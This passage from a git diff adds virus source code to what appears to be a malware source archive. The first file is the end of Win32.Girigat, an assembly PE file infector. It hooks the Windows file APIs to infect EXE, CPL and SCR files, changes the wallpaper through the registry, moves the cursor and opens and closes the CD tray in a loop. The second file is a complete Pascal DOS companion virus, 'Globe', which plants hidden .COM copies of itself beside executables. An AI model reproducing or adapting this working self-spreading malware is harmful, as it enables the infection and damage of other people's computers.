[ebp+current_month] + pop word ptr [ebp+birth_month] + ret + +bad_setup: mov eax,0ffffffffh + ret + +; Ĵ PE files infection routine + +infect_file: mov esi,ebx + mov dword ptr [ebp+victim_base],ebx + add esi,dword ptr [ebx+3ch] + mov ebx,esi + + mov eax,dword ptr [ebx+74h] + movzx ecx,word ptr [ebx+6] + shl eax,3 + add eax,78h + add eax,ebx +set_write_atb: or dword ptr [eax+24h],80000000h + add eax,28h + loop set_write_atb + + sub eax,28h + mov edx,eax + mov eax,dword ptr [edx+0ch] + add eax,dword ptr [edx+10h] + mov dword ptr [ebp+base_address],eax + add dword ptr [ebp+base_address],5 + + mov ecx,dword ptr [ebx+28h] + mov dword ptr [ebx+28h],eax + mov dword ptr [ebp+rva_entry],ecx + + cld + mov ecx,size_in_file + lea esi,dword ptr [ebp+global_start] + mov edi,dword ptr [edx+14h] + add edi,dword ptr [ebp+victim_base] + add edi,dword ptr [edx+10h] + push ecx + rep movsb + + pop ecx + add ecx,dword ptr [edx+10h] + mov dword ptr [edx+10h],ecx + + push ecx + mov esi,edx + xor edx,edx + mov eax,ecx + mov ecx,dword ptr [ebx+3ch] + mov edi,ecx + div ecx + sub edi,edx + pop ecx + add ecx,edi + mov dword ptr [esi+8],ecx + or dword ptr [esi+24h],20h + or dword ptr [esi+24h],20000000h + + mov eax,dword ptr [esi+0ch] + add eax,dword ptr [esi+8] + mov dword ptr [ebx+50h],eax + mov ebx,dword ptr [ebp+victim_base] + ret + +; ͹ API hooking routines + +apihook_cepa: lea eax,dword ptr [ebp+sz_hook_start] + lea edi,dword ptr [ebp+dd_hook_start] + +h00k_l00p: mov ecx,dword ptr [edi] + or ecx,ecx + jz no_more_hooks + + add edi,4 + push eax edi + call get_it_api + + xchg eax,esi + pop edi eax + add eax,ecx + + cmp esi,0ffffffffh + je try_next_api + + mov dword ptr [edi],esi + mov esi,dword ptr [edi+4] + add esi,ebp + mov dword ptr [edx],esi + +try_next_api: add edi,8 + jmp h00k_l00p +no_more_hooks: ret + +; Ĵ CreateFile(A/W) handler + +@@createfile: pushad + call get_relative + + mov byte ptr [ebp+unicode_api],ON + jmp crf_entry + +@createfile: pushad + call get_relative + +crf_entry: cld + mov edx,dword ptr [esp+24h] + mov esi,edx + + cmp byte ptr [ebp+unicode_api],ON + jne victim_check + + cmp byte ptr [esi+1],0 + jne victim_check + + lea edi,dword ptr [ebp+dir_buffer] + push 0 0 104h edi 0ffffffffh esi 0 0 + call dword ptr [ebp+ad_wide2multi] + + lea edx,dword ptr [ebp+dir_buffer] + mov esi,edx + +victim_check: lodsb + or al,al + jz pop_and_leave + + cmp al,'.' + jne victim_check + + push edx + lea eax,dword ptr [ebp+win32_finddata] + push eax edx + call dword ptr [ebp+ad_findfirst] + + push eax + call dword ptr [ebp+ad_findclose] + + pop edx + mov eax,dword ptr [esi-1] + call manage_file +pop_and_leave: popad + + push ebp + call get_relative + + mov ecx,ebp + pop ebp + + cmp byte ptr [ecx+unicode_api],ON + jne jmp_2_crf_a + + mov byte ptr [ecx+unicode_api],OFF + jmp dword ptr [ecx+ad_@crtfile_w] +jmp_2_crf_a: jmp dword ptr [ecx+ad_@crtfile_a] + +; Ĵ FindFirstFile(A/W) handler + +@@findfirst: pushad + call get_relative + + mov byte ptr [ebp+unicode_api],ON + jmp ffst_entry + +@findfirst: pushad + call get_relative + +ffst_entry: cld + mov edx,dword ptr [esp+24h] + mov esi,edx + + cmp byte ptr [ebp+unicode_api],ON + jne set_the_scan + + cmp byte ptr [esi+1],0 + jne set_the_scan + + lea edi,dword ptr [ebp+dir_buffer] + push 0 0 104h edi 0ffffffffh esi 0 0 + call dword ptr [ebp+ad_wide2multi] + + lea edx,dword ptr [ebp+dir_buffer] + mov esi,edx + +set_the_scan: xor ecx,ecx +scan_wildcard: lodsb + cmp al,'\' + jne check_zero + + mov ecx,esi + jmp scan_wildcard + +check_zero: or al,al + jne scan_wildcard + + mov esi,edx + lea edi,dword ptr [ebp+ff_file_path] + or ecx,ecx + jnz dont_patch + + mov ecx,esi +dont_patch: sub ecx,esi + rep movsb + + mov byte ptr [edi-1],0 + mov esi,edx +check_fname: lodsb + or al,al + jz dont_do_shit + + cmp al,'.' + jne check_fname + + push edx + lea eax,dword ptr [ebp+win32_finddata] + push eax edx + call dword ptr [ebp+ad_findfirst] + + push eax + call dword ptr [ebp+ad_findclose] + + pop edx + mov eax,dword ptr [esi-1] + call manage_file +dont_do_shit: popad + + push ebp + call get_relative + + mov ecx,ebp + pop ebp + + cmp byte ptr [ecx+unicode_api],ON + jne jmp_2_ffst_a + + mov byte ptr [ecx+unicode_api],OFF + jmp dword ptr [ecx+ad_@findfst_w] +jmp_2_ffst_a: jmp dword ptr [ecx+ad_@findfst_a] + +; Ĵ FindNextFile(A/W) handler + +@@findnext: pushad + call get_relative + + mov byte ptr [ebp+unicode_api],ON + jmp fnxt_entry + +@findnext: pushad + call get_relative + +fnxt_entry: cld + mov edx,dword ptr [esp+28h] + add edx,2ch + mov esi,edx + + cmp byte ptr [ebp+unicode_api],ON + jne go_bite_it + + cmp byte ptr [esi+1],0 + jne go_bite_it + + lea edi,dword ptr [ebp+temp_buffer] + push 0 0 104h edi 0ffffffffh esi 0 0 + call dword ptr [ebp+ad_wide2multi] + + lea edx,dword ptr [ebp+temp_buffer] + mov esi,edx + +go_bite_it: push esi + xor ecx,ecx + lea esi,dword ptr [ebp+ff_file_path] + lea edi,dword ptr [ebp+dir_buffer] + +move_string: lodsb + or al,al + jz cest_fini + + inc ecx + stosb + jmp move_string + +cest_fini: pop esi + mov edx,ecx + call add_wildcard + + lea edx,dword ptr [ebp+dir_buffer] + mov esi,edx + +name_lewp: lodsb + or al,al + jz back_to_api + + cmp al,'.' + jne name_lewp + + push edx + lea eax,dword ptr [ebp+win32_finddata] + push eax edx + call dword ptr [ebp+ad_findfirst] + + push eax + call dword ptr [ebp+ad_findclose] + + pop edx + mov eax,dword ptr [esi-1] + call manage_file +back_to_api: popad + + push ebp + call get_relative + + mov ecx,ebp + pop ebp + + cmp byte ptr [ecx+unicode_api],ON + jne jmp_2_fnxt_a + + mov byte ptr [ecx+unicode_api],OFF + jmp dword ptr [ecx+ad_@findnext_w] +jmp_2_fnxt_a: jmp dword ptr [ecx+ad_@findnext_a] + +; ͹ Payload gallery + +; Ĵ Wallpaper substitution + +new_wallpaper: lea eax,dword ptr [ebp+sz_bmp_file] + push 0 80h 2 0 0 0c0000000h eax + call dword ptr [ebp+ad_createfile] + or eax,eax + jz wall_is_done + + push eax + mov ecx,bmp_length + lea edx,dword ptr [ebp+byte_counter] + lea esi,dword ptr [ebp+bmp_start] + push 0 edx ecx esi eax + call dword ptr [ebp+ad_writefile] + or eax,eax + jz wall_is_done + + pop eax + call dword ptr [ebp+ad_closehandle] + + lea eax,dword ptr [ebp+handle_key] + lea edx,dword ptr [ebp+key_sz_desktop] + push eax 2 0 edx 80000001h + call dword ptr [ebp+ad_regopenkey] + + mov edx,dword ptr [ebp+handle_key] + lea esi,dword ptr [ebp+key_dd_wpaper] + lea edi,dword ptr [ebp+key_sz_tilewp] + push 2 esi 1 0 edi edx + call dword ptr [ebp+ad_regsetvalue] + + lea esi,dword ptr [ebp+key_dd_wpaper] + lea edi,dword ptr [ebp+key_sz_wpstyle] + push 2 esi 1 0 edi edx + call dword ptr [ebp+ad_regsetvalue] + + lea esi,dword ptr [ebp+sz_bmp_file] + lea edi,dword ptr [ebp+key_sz_wpaper] + push 2 esi 1 0 edi edx + call dword ptr [ebp+ad_regsetvalue] + + lea eax,dword ptr [ebp+handle_key] + lea edx,dword ptr [ebp+key_sz_colors] + push eax 2 0 edx 80000001h + call dword ptr [ebp+ad_regopenkey] + + mov edx,dword ptr [ebp+handle_key] + lea esi,dword ptr [ebp+key_dd_color] + lea edi,dword ptr [ebp+key_sz_bgcolor] + push 2 esi 1 0 edi edx + call dword ptr [ebp+ad_regsetvalue] +wall_is_done: ret + +; Ĵ Cursor random positioning + +crazy_cursor: mov eax,250h + call pseudorandom + + mov edx,300h + xchg edx,eax + call pseudorandom + + push edx eax + call dword ptr [ebp+ad_setcurpos] + + mov eax,5000000h +delay_eax: dec eax + or eax,eax + jnz delay_eax + jmp crazy_cursor + +; Ĵ Virus+author credits + +virus_about: push 7f03h 0 + call dword ptr [ebp+ad_loadicon] + + lea esi,dword ptr [ebp+virus_creds] + lea edi,dword ptr [ebp+about_title] + push eax esi edi 0 + call dword ptr [ebp+ad_shellabout] + ret + +; Ĵ CD caddy fun + +poltergeist: lea eax,dword ptr [ebp+sz_open_cd] + push 0 0 0 eax + call dword ptr [ebp+ad_mcisendstr] + + lea eax,dword ptr [ebp+sz_close_cd] + push 0 0 0 eax + call dword ptr [ebp+ad_mcisendstr] + jmp poltergeist + +; ͹ Viral subroutines + +; Ĵ Look for a given API in our host's IT + +get_it_api: cld + cmp word ptr [ebx],'ZM' + jne it_api_error + + mov esi,ebx + add esi,dword ptr [ebx+3ch] + mov edi,dword ptr [esi] + cmp edi,'EP' + jne it_api_error + + push eax + mov esi,dword ptr [esi+80h] + add esi,ebx + mov eax,esi + +look_for_k32: mov esi,eax + mov esi,dword ptr [esi+0ch] + add esi,ebx + cmp dword ptr [esi],'NREK' + je k32_is_here + + add eax,14h + jmp look_for_k32 + +k32_is_here: mov esi,eax + mov eax,dword ptr [esi+10h] + add eax,ebx + mov dword ptr [ebp+imp_tbl_desc],eax + cmp dword ptr [esi],0 + je it_api_error + + pop edi + xor eax,eax + mov esi,dword ptr [esi] + add esi,ebx + mov edx,esi + +search_it_api: cmp dword ptr [edx],0 + je it_api_error + + cmp byte ptr [edx+3],80h + je add_and_lewp + + push ecx edi + mov esi,2 + add esi,ebx + add esi,dword ptr [edx] + repe cmpsb + + cmp ecx,0 + pop edi ecx + jne add_and_lewp + + shl eax,2 + add eax,dword ptr [ebp+imp_tbl_desc] + mov edx,eax + mov eax,dword ptr [eax] + ret + +add_and_lewp: inc eax + add edx,4 + jmp search_it_api + +it_api_error: mov eax,0ffffffffh + ret + +; Ĵ Look for a given API in KERNEL32's ET + +get_et_api: cld + push ebx eax + mov ebx,dword ptr [ebp+ad_kernel32] + cmp word ptr [ebx],'ZM' + jne et_api_error + + mov esi,dword ptr [ebx+3ch] + add esi,ebx + + cmp word ptr [esi],'EP' + jne et_api_error + + mov esi,dword ptr [esi+78h] + add esi,ebx + + mov eax,dword ptr [esi+1ch] + add eax,ebx + mov dword ptr [ebp+@functions],eax + + mov eax,dword ptr [esi+20h] + add eax,ebx + mov dword ptr [ebp+@names],eax + + mov eax,dword ptr [esi+24h] + add eax,ebx + mov dword ptr [ebp+@ordinals],eax + xor eax,eax + pop esi + +search_et_api: push ecx esi + mov edi,dword ptr [ebp+@names] + add edi,eax + mov edi,dword ptr [edi] + add edi,dword ptr [ebp+ad_kernel32] + repe cmpsb + + cmp ecx,0 + jne go_for_next + + pop esi ecx + shr eax,1 + xor ebx,ebx + + add eax,dword ptr [ebp+@ordinals] + mov bx,word ptr [eax] + shl ebx,2 + + add ebx,dword ptr [ebp+@functions] + mov eax,dword ptr [ebx] + add eax,dword ptr [ebp+ad_kernel32] + pop ebx + ret + +go_for_next: pop esi ecx + add eax,4 + jmp search_et_api + +et_api_error: mov eax,0ffffffffh + pop ebx + ret + +; Ĵ Chromatos self-behavior mutation engine + +chromatos: mov ecx,5 + lea edi,dword ptr [ebp+flags_start] + +first_phase: mov eax,0ah + call pseudorandom + cmp eax,4 + jae activ8_flag + + xor eax,eax + jmp update_flag + +activ8_flag: mov eax,1 +update_flag: mov byte ptr [edi],al + inc edi + loop first_phase + + mov ecx,2 +second_phase: mov eax,1 + call pseudorandom + + mov byte ptr [edi],al + inc edi + loop second_phase + + cmp byte ptr [ebp+flag_hooking],OFF + jne dir_flags + + mov byte ptr [ebp+flag_runtime],ON +dir_flags: cmp byte ptr [ebp+flag_windir],OFF + jne file_flags + + mov byte ptr [ebp+flag_curdir],ON +file_flags: cmp byte ptr [ebp+flag_hit_cpl],OFF + jne no_prob_babe + + cmp byte ptr [ebp+flag_hit_scr],OFF + jne no_prob_babe + + mov byte ptr [ebp+flag_hit_exe],ON +no_prob_babe: ret + +; Ĵ Pseudorandom value generator + +pseudorandom: push ecx edx + mov ecx,eax + call get_random + + xor edx,edx + div ecx + + mov eax,edx + pop edx ecx + ret + +; Ĵ Random value generator + +get_random: push ecx edx + mov eax,dword ptr [ebp+random_seed] + mov ecx,eax + imul eax,41c64e6dh + add eax,3039h + mov dword ptr [ebp+random_seed],eax + xor eax,ecx + pop edx ecx + ret + +; Ĵ Add wildcard to directory buffer + +add_wildcard: cld + lea edi,dword ptr [ebp+edx+dir_buffer] + mov al,'\' + stosb + +copy_string: lodsb + stosb + or al,al + jnz copy_string + ret + +; Ĵ Process current file + +manage_file: cmp byte ptr [ebp+flag_hit_cpl],ON + jne check_exe + + cmp eax,'LPC.' + je process_file + + cmp eax,'lpc.' + je process_file + +check_exe: cmp byte ptr [ebp+flag_hit_exe],ON + jne check_scr + + cmp eax,'EXE.' + je process_file + + cmp eax,'exe.' + je process_file + +check_scr: cmp byte ptr [ebp+flag_hit_scr],ON + jne just_return + + cmp eax,'RCS.' + je process_file + + cmp eax,'rcs.' + jne just_return + +process_file: push edx + call open_map_file + or ebx,ebx + jz invalid_file + + call setup_file + cmp eax,0ffffffffh + je unmap_n_close + + call unmap_close + pop edx + add dword ptr [ebp+win32_finddata+20h],size_in_file + call open_map_file + + call infect_file + call unmap_close + ret + +unmap_n_close: call unmap_close +invalid_file: pop edx +just_return: ret + +; Ĵ Open a file and memory-map it + +open_map_file: push 0 80h 3 0 0 0c0000000h edx + call dword ptr [ebp+ad_createfile] + cmp eax,0ffffffffh + je exit_mapping + + mov dword ptr [ebp+handle_open],eax + push 0 dword ptr [ebp+win32_finddata+20h] + push 0 4 0 dword ptr [ebp+handle_open] + call dword ptr [ebp+ad_cfmapping] + or eax,eax + jz close_handle + + mov dword ptr [ebp+handle_map],eax + push dword ptr [ebp+win32_finddata+20h] + push 0 0 2 dword ptr [ebp+handle_map] + call dword ptr [ebp+ad_mapview] + xchg ebx,eax + or ebx,ebx + jz close_mapping + ret + +; Ĵ Unmap a file and close its handle + +unmap_close: push ebx + call dword ptr [ebp+ad_unmapview] + +close_mapping: push dword ptr [ebp+handle_map] + call dword ptr [ebp+ad_closehandle] + +close_handle: push dword ptr [ebp+handle_open] + call dword ptr [ebp+ad_closehandle] + +exit_mapping: xor ebx,ebx + ret + +; Ĵ Get a relative offset + +get_relative: call lambda_offset +lambda_offset: pop ebp + sub ebp,offset lambda_offset + ret + +; Ĵ Girigat BMP logo + +bmp_start label byte + db 42h,4dh,5eh,04h,0,0,0,0,0,0,76h,0,0,0,28h,0,0,0,49h,0,0,0,19h + db 0,0,0,1,0,4,0,0,0,0,0,0e8h,3,0,0,0c4h,0eh,0,0,0c4h,0eh,0,0,0,0 + db 0,0,0,0,0,0,0ffh,0ffh,0ffh,0,0e1h,0f3h,0ffh,0,0aeh,0dbh,0ffh,0 + db 8dh,0cbh,0feh,0,9ah,0d3h,0fdh,0,70h,0beh,0fah,0,6bh,0bch,0f9h + db 0,0,99h,0eeh,0,18h,17h,12h,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,90h,0,0,0,99h,22h + db 22h,99h,99h,99h,99h,99h,92h,22h,99h,99h,22h,22h,99h,99h,99h,99h + db 99h,22h,29h,99h,99h,99h,99h,33h,39h,99h,99h,99h,22h,29h,33h,39h + db 99h,99h,90h,0,0,0,99h,27h,72h,99h,99h,99h,99h,99h,22h,72h + db 99h,99h,27h,72h,99h,99h,99h,99h,92h,27h,29h,99h,99h,99h,93h,37h + db 39h,99h,99h,92h,77h,73h,37h,39h,99h,99h,90h,0,0,0,99h,27h + db 72h,99h,99h,99h,99h,99h,27h,72h,99h,99h,27h,72h,99h,99h,99h,99h + db 22h,77h,29h,99h,99h,99h,93h,77h,39h,99h,99h,27h,77h,23h,77h,39h + db 99h,99h,90h,0,0,0,99h,27h,72h,99h,99h,22h,22h,99h,27h,72h + db 99h,99h,27h,72h,99h,99h,99h,92h,27h,72h,99h,93h,33h,39h,93h,77h + db 39h,99h,93h,77h,22h,83h,77h,39h,99h,99h,90h,0,0,0,99h,27h + db 72h,99h,92h,27h,72h,99h,27h,72h,99h,99h,27h,72h,99h,99h,99h,22h + db 77h,29h,99h,33h,77h,39h,93h,77h,39h,99h,37h,73h,28h,83h,77h,39h + db 99h,99h,90h,0,0,0,99h,27h,72h,99h,22h,77h,72h,99h,27h,72h + db 99h,99h,27h,72h,99h,99h,93h,37h,72h,99h,93h,37h,77h,39h,93h,77h + db 39h,99h,37h,73h,88h,83h,77h,39h,99h,99h,90h,0,0,0,99h,27h + db 72h,99h,27h,77h,72h,99h,27h,72h,99h,99h,27h,72h,99h,99h,33h,77h + db 33h,99h,93h,77h,77h,39h,93h,77h,39h,99h,37h,73h,88h,83h,77h,39h + db 99h,99h,90h,0,0,0,99h,27h,72h,99h,27h,77h,72h,99h,27h,72h + db 99h,99h,27h,72h,99h,99h,37h,77h,73h,99h,93h,77h,77h,39h,93h,77h + db 39h,99h,37h,73h,38h,83h,77h,39h,99h,99h,90h,0,0,0,99h,27h + db 72h,99h,27h,27h,72h,99h,27h,72h,99h,99h,27h,72h,99h,93h,37h,77h + db 73h,99h,93h,73h,77h,39h,93h,77h,39h,99h,37h,77h,33h,33h,77h,39h + db 99h,99h,90h,0,0,0,99h,27h,72h,99h,22h,27h,72h,99h,27h,72h + db 99h,99h,27h,72h,99h,93h,77h,77h,73h,39h,93h,33h,77h,39h,93h,77h + db 39h,99h,37h,77h,77h,77h,77h,39h,99h,99h,90h,0,0,0,99h,27h + db 72h,99h,99h,27h,72h,99h,27h,72h,99h,99h,27h,72h,99h,93h,73h,37h + db 77h,39h,99h,93h,77h,39h,93h,77h,39h,99h,93h,77h,77h,77h,77h,39h + db 99h,99h,90h,0,0,0,99h,27h,72h,99h,99h,27h,72h,99h,27h,72h + db 99h,99h,27h,72h,99h,99h,99h,37h,77h,39h,99h,93h,77h,39h,93h,77h + db 39h,99h,99h,99h,99h,93h,77h,39h,99h,99h,90h,0,0,0,92h,27h + db 72h,22h,22h,27h,72h,22h,27h,72h,24h,41h,27h,75h,33h,33h,33h,37h + db 77h,33h,33h,33h,77h,33h,33h,77h,33h,33h,33h,33h,33h,33h,77h,33h + db 33h,33h,30h,0,0,0,22h,77h,77h,77h,77h,77h,77h,77h,77h,77h + db 77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h + db 77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,30h,0,0,0,27h,77h + db 77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h + db 77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h,77h + db 77h,33h,30h,0,0,0,22h,27h,72h,22h,22h,22h,22h,22h,22h,22h + db 22h,26h,37h,73h,33h,33h,33h,33h,33h,33h,33h,33h,33h,33h,33h,33h + db 33h,33h,33h,33h,33h,33h,33h,33h,33h,39h,90h,0,0,0,99h,27h + db 72h,99h,99h,99h,99h,99h,99h,99h,99h,99h,37h,73h,99h,99h,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,90h,0,0,0,99h,27h,72h,99h,99h,97h,72h,99h,99h,99h + db 99h,99h,37h,73h,99h,99h,97h,73h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,90h,0,0,0,99h,27h + db 77h,22h,77h,77h,22h,99h,99h,99h,99h,99h,37h,77h,33h,77h,77h,33h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,90h,0,0,0,99h,27h,77h,77h,77h,72h,29h,99h,99h,99h + db 99h,99h,37h,77h,77h,77h,73h,39h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,90h,0,0,0,99h,22h + db 77h,72h,22h,22h,99h,99h,99h,99h,99h,99h,33h,77h,73h,33h,33h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,90h,0,0,0,99h,92h,22h,22h,99h,99h,99h,99h,99h,99h + db 99h,99h,93h,33h,33h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,90h,0,0,0,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,90h,0,0,0,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,99h + db 99h,99h,99h,99h,99h,99h,99h,99h,99h,99h,90h,0,0,0 +bmp_end label byte + +; ͹ Data area + +; Ĵ Internal data + +ON equ 1 +OFF equ 0 +rgb_value db 0 +element_no db 1 +buffer_size dd 102h + +base_default equ 400000h +bmp_length equ bmp_end-bmp_start +size_in_file equ file_end-global_start + +key_dd_wpaper db '0',0 +key_dd_color db '0 0 0',0 + +flags_start label byte +flag_curdir db ON +flag_windir db OFF +flag_hooking db ON +flag_runtime db ON +flag_hit_exe db ON +flag_hit_cpl db OFF +flag_hit_scr db OFF +flags_end label byte + +birth_month dw ? +birth_day dw ? + +@sz_apis_start label byte + dd offset sz_gcompname + dd offset sz_lstrcpy + dd offset sz_getsystime + dd offset sz_loadlibrary + dd offset sz_writefile + dd offset sz_getcurdir + dd offset sz_getwindir + dd offset sz_getsysdir + dd offset sz_findfirst + dd offset sz_findnext + dd offset sz_findclose + dd offset sz_createfile + dd offset sz_cfmapping + dd offset sz_mapview + dd offset sz_unmapview + dd offset sz_closehandle + dd offset sz_wide2multi +@sz_apis_end label byte + +@payloads_start label byte + dd offset new_wallpaper + dd offset crazy_cursor + dd offset virus_about + dd offset poltergeist +@payloads_end label byte + +dd_hook_start label byte +dd_@crtfile_a dd sz_@crtfile_w-sz_@crtfile_a +ad_@crtfile_a dd ? +@ad_crtfile_a dd offset @createfile +dd_@crtfile_w dd sz_@findfst_a-sz_@crtfile_w +ad_@crtfile_w dd ? +@ad_crtfile_w dd offset @@createfile +dd_@findfst_a dd sz_@findfst_w-sz_@findfst_a +ad_@findfst_a dd ? +@ad_findfst_a dd offset @findfirst +dd_@findfst_w dd sz_@findnext_a-sz_@findfst_w +ad_@findfst_w dd ? +@ad_findfst_w dd offset @@findfirst +dd_@findnext_a dd sz_@findnext_w-sz_@findnext_a +ad_@findnext_a dd ? +@ad_findnext_a dd offset @findnext +dd_@findnext_w dd sz_hook_end-sz_@findnext_w +ad_@findnext_w dd ? +@ad_findnext_w dd offset @@findnext +dd_hook_end dd 0 + +sz_kernel32 db 'KERNEL32.dll',0 +sz_user32 db 'USER32.dll',0 +sz_advapi32 db 'ADVAPI32.dll',0 +sz_winmm db 'WINMM.dll',0 +sz_shell32 db 'SHELL32.dll',0 +sz_gmhandlea db 'GetModuleHandleA',0 +sz_gmhandlew db 'GetModuleHandleW',0 +sz_gpaddress db 'GetProcAddress',0 + +sz_apis_start label byte +sz_gcompname db 'GetComputerNameA',0 +sz_lstrcpy db 'lstrcpyA',0 +sz_getsystime db 'GetSystemTime',0 +sz_loadlibrary db 'LoadLibraryA',0 +sz_writefile db 'WriteFile',0 +sz_getcurdir db 'GetCurrentDirectoryA',0 +sz_getwindir db 'GetWindowsDirectoryA',0 +sz_getsysdir db 'GetSystemDirectoryA',0 +sz_findfirst db 'FindFirstFileA',0 +sz_findnext db 'FindNextFileA',0 +sz_findclose db 'FindClose',0 +sz_createfile db 'CreateFileA',0 +sz_cfmapping db 'CreateFileMappingA',0 +sz_mapview db 'MapViewOfFile',0 +sz_unmapview db 'UnmapViewOfFile',0 +sz_closehandle db 'CloseHandle',0 +sz_wide2multi db 'WideCharToMultiByte',0 +sz_apis_end label byte + +sz_xapis_start label byte +sz_setcurpos db 'SetCursorPos',0 +sz_loadicon db 'LoadIconA',0 +sz_shellabout db 'ShellAboutA',0 +sz_mcisendstr db 'mciSendStringA',0 +sz_regopenkey db 'RegOpenKeyExA',0 +sz_regsetvalue db 'RegSetValueExA',0 +sz_xapis_end label byte + +sz_hook_start label byte +sz_@crtfile_a db 'CreateFileA',0 +sz_@crtfile_w db 'CreateFileW',0 +sz_@findfst_a db 'FindFirstFileA',0 +sz_@findfst_w db 'FindFirstFileW',0 +sz_@findnext_a db 'FindNextFileA',0 +sz_@findnext_w db 'FindNextFileW',0 +sz_hook_end label byte + +about_title db 'System Info#+ Girigat.4937',0 +virus_creds db '(C) 1998-1999 Mister Sandman',0 + +key_sz_wpaper db 'Wallpaper',0 +key_sz_tilewp db 'TileWallpaper',0 +key_sz_wpstyle db 'WallpaperStyle',0 +key_sz_bgcolor db 'Background',0 +key_sz_desktop db 'Control Panel\Desktop',0 +key_sz_colors db 'Control Panel\Colors',0 + +sz_wildcard db '*.*',0 +sz_bmp_file db 'c:\Girigat.bmp',0 +sz_open_cd db 'set cdaudio door open',0 +sz_close_cd db 'set cdaudio door closed',0 +sz_comp_name db 0ah dup (?) +random_seed dd 0bebafecah +file_end label byte + +; Ĵ External data + +ad_kernel32 dd ? +ad_gmhandlea dd ? +ad_gmhandlew dd ? +ad_gpaddress dd ? + +ad_apis_start label byte +ad_gcompname dd ? +ad_lstrcpy dd ? +ad_getsystime dd ? +ad_loadlibrary dd ? +ad_writefile dd ? +ad_getcurdir dd ? +ad_getwindir dd ? +ad_getsysdir dd ? +ad_findfirst dd ? +ad_findnext dd ? +ad_findclose dd ? +ad_createfile dd ? +ad_cfmapping dd ? +ad_mapview dd ? +ad_unmapview dd ? +ad_closehandle dd ? +ad_wide2multi dd ? +ad_apis_end label byte + +ad_xapis_start label byte +ad_setcurpos dd ? +ad_loadicon dd ? +ad_shellabout dd ? +ad_mcisendstr dd ? +ad_regopenkey dd ? +ad_regsetvalue dd ? +ad_xapis_end label byte + +current_time label byte +current_year dw ? +current_month dw ? +current_dow dw ? +current_day dw ? +current_hour dw ? +current_minute dw ? +current_secs dw ? +current_msecs dw ? + +handle_key dd ? +handle_search dd ? +handle_open dd ? +handle_map dd ? + +@functions dd ? +@names dd ? +@ordinals dd ? +imp_tbl_desc dd ? +victim_base dd ? +pe_alignment dd ? +byte_counter dd ? +unicode_api db OFF + +dir_buffer db 104h dup (?) +win32_finddata db 13eh dup (?) +ff_file_path db 104h dup (?) +temp_buffer db 104h dup (?) + +; ͹ Fake host code + +host_entry: push offset sz_kernel32 + call GetModuleHandleA + or eax,eax + jz host_code + mov dword ptr [ad_kernel32],eax + jmp file_entry + +host_code: push 10h offset box_title + push offset box_text 0 + call MessageBoxA + + push 0 + call ExitProcess + + .data +box_title db 'Virus Alert!',0 +box_text db 'Win32.Girigat is now active! ',0 + end host_entry diff --git a/MSDOS/Virus.MSDOS.Unknown.globe.asm b/MSDOS/Virus.MSDOS.Unknown.globe.asm new file mode 100644 index 00000000..3a126f4d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.globe.asm @@ -0,0 +1,106 @@ +Program Worm; + +{$M 2048,0,4096} + +Uses Dos, Crt; + +Var F1 : File; + F2 : File; + O : String; + Parm : String; + P : DirStr; + N : NameStr; + E : ExtStr; + Buf : Array[0..8000] of Byte; + NumRead : Word; + NumWritten : Word; + DirInfo : SearchRec; + ComExist : SearchRec; + Infect : Byte; + +Procedure StartOrigExe; +Begin + O := ParamStr(0); + FSplit(O,P,N,E); + O := P+N+'.EXE'; + P := ''; + For NumRead := 1 To ParamCount Do + P := P + ParamStr(NumRead); + SwapVectors; + Exec(O,P); + SwapVectors; +End; + +Procedure InfectExe; +Begin +FindFirst('*.EXE',Archive,DirInfo); +While (DosError = 0) And (Infect <> 0) Do + Begin + FSplit(DirInfo.Name,P,N,E); + O := P+N+'.COM'; + FindFirst(O,Hidden,ComExist); + If DosError <> 0 Then + Begin + Assign(F1,O); + Rewrite(F1,1); + BlockWrite(F1,buf,NumRead,NumWritten); + Close(F1); + SetFattr(F1,Hidden); + Dec(Infect); + End; + FindNext(DirInfo); + End; +End; + +Procedure Activate; +Var + T1,T2 : Integer; + I : Real; + X , Y : Byte; + Resolution : Integer; + +Begin +ClrScr; +I := 0; +T2 := 38; +Randomize; +Repeat +Resolution := 50; +For T1 := 0 to Resolution Do + Begin + X := Abs(40+Round(Sin(I)*T2)); + Y := Abs(12-Round(Cos(I)*10)); + GotoXY(X,Y); + Write(''); + I := I + ((Pi*2)/Resolution); + End; + T2 := T2 - 1; + TextColor(Random(14)+1); +Until T2 < 2; +GotoXY(30,12); +TextColor(White); +Write('* The Globe Virus *'); + Asm + Mov Ah,8 + Int 21h + End; +ClrScr; +End; + +Begin + Infect := 3; + Randomize; + Assign(F2,ParamStr(0)); + Reset(F2,1); + BlockRead(F2,buf,SizeOf(buf),NumRead); + Close(F2); + InfectExe; + StartOrigExe; + If Random(16) = 0 then Activate; + Halt(DosExitCode); +End. + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; diff --git 